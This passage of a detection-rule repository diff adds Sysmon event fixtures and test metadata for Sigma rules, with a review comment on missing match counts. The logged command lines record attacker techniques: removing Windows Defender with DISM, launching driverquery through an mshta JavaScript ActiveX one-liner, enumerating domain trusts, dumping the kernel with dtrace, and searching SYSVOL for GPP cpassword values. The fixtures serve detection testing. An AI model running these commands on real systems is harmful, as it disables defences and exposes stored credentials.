Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_dism_remove/43e32da2-fdd0-4156-90de-50dfd62636f9.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_dism_remove/43e32da2-fdd0-4156-90de-50dfd62636f9.json b/regression_data/windows/process_creation/proc_creation_win_dism_remove/43e32da2-fdd0-4156-90de-50dfd62636f9.json
new file mode 100644
index 000000000..1f64e5728
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_dism_remove/43e32da2-fdd0-4156-90de-50dfd62636f9.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:47:34.903176Z" + } + }, + "EventRecordID": 9055342, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:47:34.894", + "ProcessGuid": "5AA13A44-D4F6-68FC-F430-000000004002", + "ProcessId": 7808, + "Image": "C:\\Windows\\System32\\Dism.exe", + "FileVersion": "10.0.20348.2849 (WinBuild.160101.0800)", + "Description": "Dism Image Servicing Utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "DISM.EXE", + "CommandLine": "Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=0AABFEC24BA5FC8806492DCCE89094743219EDE4,MD5=0B1CB657FF6BF807D830A5B970ECC041,SHA256=1B1EC450CE9B4559C6A2AE8ED5D8715F5135BE20257DC84ED11EBB814F29A1F2,IMPHASH=7B40129B2F7F51468E0954D5A44D9CDD", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": 
"ATTACKRANGE\\Administrator"
+ }
+ }
+}
diff --git a/regression_data/windows/process_creation/proc_creation_win_dism_remove/info.yml b/regression_data/windows/process_creation/proc_creation_win_dism_remove/info.yml
new file mode 100644
index 000000000..3ed51243f
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_dism_remove/info.yml
@@ -0,0 +1,13 @@
+id: b4459771-0fe5-4777-be95-ea6fce92d1fc
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 43e32da2-fdd0-4156-90de-50dfd62636f9
+ title: Dism Remove Online Package
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_dism_remove/43e32da2-fdd0-4156-90de-50dfd62636f9.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.evtx b/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.evtx
new file mode 100644
index 000000000..c491237b3
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.json b/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.json
new file mode 100644
index 000000000..d2d824504
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T23:53:43.425641Z" + } + }, + "EventRecordID": 33534161, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-26 23:53:43.425", + "ProcessGuid": "5AA13A44-B487-68FE-7F5F-000000004002", + "ProcessId": 2052, + "Image": "C:\\Windows\\System32\\driverquery.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Queries the drivers on a system", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "drvqry.exe", + "CommandLine": "\"C:\\Windows\\System32\\driverquery.exe\"", + "CurrentDirectory": "C:\\Windows\\Temp\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=67241EC6E9855CEE71833940C4BB504BB1A50298,MD5=F4D90639E3DA5F6C514495F20AE0322A,SHA256=2202CE439C7DE1CECABA76534B5B7646E0BE585E72E129C86D6B8AFB67F7D212,IMPHASH=033B70299A7F2D13D2CCD201F2FD5461", + "ParentProcessGuid": "5AA13A44-B487-68FE-7E5F-000000004002", + "ParentProcessId": 11360, + "ParentImage": "C:\\Windows\\System32\\mshta.exe", + "ParentCommandLine": "mshta \"javascript:new ActiveXObject('WScript.Shell').Run('driverquery.exe');close();\"", + "ParentUser": 
"ATTACKRANGE\\Administrator"
+ }
+ }
+}
diff --git a/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/info.yml b/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/info.yml
new file mode 100644
index 000000000..4cc1aabef
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/info.yml
@@ -0,0 +1,12 @@
+id: 585f7fa9-392b-4609-b324-4701482de7ec
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 9fc3072c-dc8f-4bf7-b231-18950000fadd
+ title: Potential Recon Activity Using DriverQuery.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ path: regression_data/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.evtx b/regression_data/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.evtx
new file mode 100644
index 000000000..0cb95a003
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.json b/regression_data/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.json
new file mode 100644
index 000000000..e4e8c7d94
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.json
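Review bot: The info.yml for proc_creation_win_driverquery_recon omits `match_count`, while the sibling entries in this commit (proc_creation_win_discovery_via_reg_queries, proc_creation_win_dism_remove, proc_creation_win_dsquery_domain_trust_discovery, the two findstr entries) set `match_count: 1` for the same single-event Positive Detection Test; the same omission appears in the hunks for proc_creation_win_driverquery_usage, proc_creation_win_dtrace_kernel_dump and proc_creation_win_explorer_folder_shortcut_via_shell_binary. Unless the runner defines a default for an absent key, these four tests presumably verify only that the checker runs, not that the rule fires the expected number of times, which is the regression a positive fixture is meant to catch. I would add `match_count: 1` under the test entry here and in the driverquery_usage and explorer entries, and `match_count: 2` for the dtrace entry, whose fixture holds two dtrace.exe events that both presumably match. `description: N/A` on every new info.yml is also a placeholder; a one-line statement of what the fixture exercises (e.g. `description: driverquery.exe spawned by mshta.exe`, taken from the event's ParentImage) would make each test self-describing.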
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T23:47:36.476583Z" + } + }, + "EventRecordID": 33403755, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-26 23:47:36.462", + "ProcessGuid": "5AA13A44-B318-68FE-4B5F-000000004002", + "ProcessId": 8840, + "Image": "C:\\Windows\\System32\\driverquery.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Queries the drivers on a system", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "drvqry.exe", + "CommandLine": "driverquery", + "CurrentDirectory": "C:\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=67241EC6E9855CEE71833940C4BB504BB1A50298,MD5=F4D90639E3DA5F6C514495F20AE0322A,SHA256=2202CE439C7DE1CECABA76534B5B7646E0BE585E72E129C86D6B8AFB67F7D212,IMPHASH=033B70299A7F2D13D2CCD201F2FD5461", + "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ParentProcessId": 10048, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_driverquery_usage/info.yml b/regression_data/windows/process_creation/proc_creation_win_driverquery_usage/info.yml
new file mode 100644
index 000000000..2b8e71fe3
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_driverquery_usage/info.yml
@@ -0,0 +1,12 @@
+id: 13b0c2d7-2056-4ce4-85df-79f7e499dd49
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: a20def93-0709-4eae-9bd2-31206e21e6b2
+ title: DriverQuery.EXE Execution
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ path: regression_data/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.evtx b/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.evtx
new file mode 100644
index 000000000..c02ab7830
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.json b/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.json
new file mode 100644
index 000000000..df3ca069d
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:48:36.392892Z" + } + }, + "EventRecordID": 9075053, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:48:36.383", + "ProcessGuid": "5AA13A44-D534-68FC-FF30-000000004002", + "ProcessId": 168, + "Image": "C:\\Windows\\System32\\dsquery.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Microsoft AD DS/LDS query command line utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "dsquery.exe", + "CommandLine": "dsquery * -filter \"(objectClass=trustedDomain)\" -attr *", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=D6F0AD64BECE9028108C0C807E3C3A0EEAF4C31C,MD5=3A94027001259B03449AB5DC8B764E83,SHA256=A3720A70B407F069E21F2EF759236C2A7871A03D00B0AC7F0ACD201DA1086CB0,IMPHASH=0C732EE7E7F8F559606E6ADF3AA39CDC", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": 
"ATTACKRANGE\\Administrator"
+ }
+ }
+}
diff --git a/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/info.yml b/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/info.yml
new file mode 100644
index 000000000..cfd84a7ca
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/info.yml
@@ -0,0 +1,13 @@
+id: 91c77c64-7f4f-4bba-be6a-42377c97b48a
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 3bad990e-4848-4a78-9530-b427d854aac0
+ title: Domain Trust Discovery Via Dsquery
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.evtx b/regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.evtx
new file mode 100644
index 000000000..fe978d049
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.json b/regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.json
new file mode 100644
index 000000000..0993a5ac0
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.json
@@ -0,0 +1,132 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-27T00:04:12.105550Z" + } + }, + "EventRecordID": 33630917, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3380, + "ThreadID": 4420 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-27 00:04:12.104", + "ProcessGuid": "5AA13A44-B6FC-68FE-0802-000000004102", + "ProcessId": 2524, + "Image": "C:\\Program Files\\DTrace\\dtrace.exe", + "FileVersion": "10.0.22621.1 (WinBuild.160101.0800)", + "Description": "DTrace/NT", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "dtrace.exe", + "CommandLine": "dtrace.exe -w \"syscall:::return {lkd(0); exit(0);}\"", + "CurrentDirectory": "C:\\Program Files\\DTrace\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-B54F-68FE-E547-0C0000000000", + "LogonId": "0xc47e5", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=5ECD16526AB7288C9910692B3BC73041605CD0CF,MD5=AE913F95E1F94B071DED1FFBB60EDDBD,SHA256=75C00C03BB318FCDB329D29E705C7815E14E48C801D6322984C899FAEDDBBF55,IMPHASH=DC497C8CA3DFCDF940058114BA89B413", + "ParentProcessGuid": "5AA13A44-B6AD-68FE-FC01-000000004102", + "ParentProcessId": 10508, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + 
"#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-27T00:04:13.045253Z" + } + }, + "EventRecordID": 33630948, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3380, + "ThreadID": 4420 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-27 00:04:13.044", + "ProcessGuid": "5AA13A44-B6FD-68FE-0902-000000004102", + "ProcessId": 7748, + "Image": "C:\\Program Files\\DTrace\\dtrace.exe", + "FileVersion": "10.0.22621.1 (WinBuild.160101.0800)", + "Description": "DTrace/NT", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "dtrace.exe", + "CommandLine": "dtrace.exe -w -n \"syscall:::return {lkd(0); exit(0);}\"", + "CurrentDirectory": "C:\\Program Files\\DTrace\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-B54F-68FE-E547-0C0000000000", + "LogonId": "0xc47e5", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=5ECD16526AB7288C9910692B3BC73041605CD0CF,MD5=AE913F95E1F94B071DED1FFBB60EDDBD,SHA256=75C00C03BB318FCDB329D29E705C7815E14E48C801D6322984C899FAEDDBBF55,IMPHASH=DC497C8CA3DFCDF940058114BA89B413", + "ParentProcessGuid": "5AA13A44-B6AD-68FE-FC01-000000004102", + "ParentProcessId": 10508, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/info.yml b/regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/info.yml
new file mode 100644
index 000000000..88dc48265
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/info.yml
@@ -0,0 +1,12 @@
+id: c81d2cc0-3296-47fd-b57d-334b3a17ab02
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 7124aebe-4cd7-4ccb-8df0-6d6b93c96795
+ title: Suspicious Kernel Dump Using Dtrace
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ path: regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/c3d76afc-93df-461e-8e67-9b2bad3f2ac4.evtx b/regression_data/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/c3d76afc-93df-461e-8e67-9b2bad3f2ac4.evtx
new file mode 100644
index 000000000..65db5293c
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/c3d76afc-93df-461e-8e67-9b2bad3f2ac4.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/c3d76afc-93df-461e-8e67-9b2bad3f2ac4.json b/regression_data/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/c3d76afc-93df-461e-8e67-9b2bad3f2ac4.json
new file mode 100644
index 000000000..510ba4156
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/c3d76afc-93df-461e-8e67-9b2bad3f2ac4.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-27T00:08:16.515256Z" + } + }, + "EventRecordID": 33635575, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3380, + "ThreadID": 4420 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-27 00:08:16.514", + "ProcessGuid": "5AA13A44-B7F0-68FE-2902-000000004102", + "ProcessId": 9040, + "Image": "C:\\Windows\\explorer.exe", + "FileVersion": "10.0.20348.3692 (WinBuild.160101.0800)", + "Description": "Windows Explorer", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "EXPLORER.EXE", + "CommandLine": "explorer shell:MyComputerFolder", + "CurrentDirectory": "C:\\Program Files\\DTrace\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-B54F-68FE-E547-0C0000000000", + "LogonId": "0xc47e5", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=8BAA602FDC6BA67545C0717E2B9063A0BFE3F278,MD5=1FB8907465FB58429762D97C1FBEA04A,SHA256=53F36699C35C8F2360608A79F0809BA888C61F15886AE2B1F209A3E9B896CBA7,IMPHASH=BECD30EE79098B21A5BA5E5CF0E18B83", + "ParentProcessGuid": "5AA13A44-B6AD-68FE-FC01-000000004102", + "ParentProcessId": 10508, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/info.yml b/regression_data/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/info.yml
new file mode 100644
index 000000000..426d1a0da
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/info.yml
@@ -0,0 +1,12 @@
+id: ddbc40a4-117f-4359-9a22-f943dd25535f
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: c3d76afc-93df-461e-8e67-9b2bad3f2ac4
+ title: File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ path: regression_data/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/c3d76afc-93df-461e-8e67-9b2bad3f2ac4.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.evtx b/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.evtx
new file mode 100644
index 000000000..884753da5
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.json b/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.json
new file mode 100644
index 000000000..98a4da0c2
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:50:13.199218Z" + } + }, + "EventRecordID": 9105822, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:50:13.191", + "ProcessGuid": "5AA13A44-D595-68FC-0A31-000000004002", + "ProcessId": 7772, + "Image": "C:\\Windows\\System32\\findstr.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Find String (QGREP) Utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "FINDSTR.EXE", + "CommandLine": "findstr /S cpassword \\\\AR-WIN-DC\\sysvol\\*.xml", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/info.yml b/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/info.yml
new file mode 100644
index 000000000..2ad8b04be
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/info.yml
@@ -0,0 +1,13 @@
+id: 1f7942f7-fd5d-40e1-ac60-df1298f49bb0
+description: N/A
+date: 2025-10-24
